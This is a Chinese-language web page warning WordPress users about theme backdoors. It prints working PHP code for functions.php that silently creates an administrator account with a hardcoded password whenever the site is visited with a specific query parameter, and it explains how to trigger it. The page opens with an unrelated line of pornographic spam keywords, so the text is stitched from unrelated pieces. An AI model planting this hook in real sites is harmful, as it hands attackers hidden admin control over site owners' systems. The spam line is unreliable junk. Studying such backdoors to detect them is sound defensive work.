欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

防范wordpress主題加后門代碼獲取管理員權(quán)限

  發(fā)布時(shí)間:2013-12-27 11:43:03   作者:佚名   我要評(píng)論
只需幾行代碼就可以為WordPress主題留下后門,大家要小心了


復(fù)制代碼
代碼如下:

add_action( 'wp_head', 'my_backdoor' );
function my_backdoor() {
if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
require( 'wp-includes/registration.php' );
if ( !username_exists( 'backdoor' ) ) {
$user_id = wp_create_user( 'backdoor', 'pa55w0rd!' );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
}

簡單說明下,代碼主要放于functions.php文件里面,不會(huì)影響任何功能使用,如果存在此代碼,任何人只要運(yùn)行http://www.你的域名.com/?backdoor=go,然后就創(chuàng)建了一個(gè)用戶名為“backdoor”,密碼為:“pa55w0rd!” 的管理員。同樣具備管理員的權(quán)限,很編輯主題代碼文件,相信此時(shí)你一定感覺到很危險(xiǎn)了吧,趕緊檢查檢查自己的主題代碼吧……

相關(guān)文章

最新評(píng)論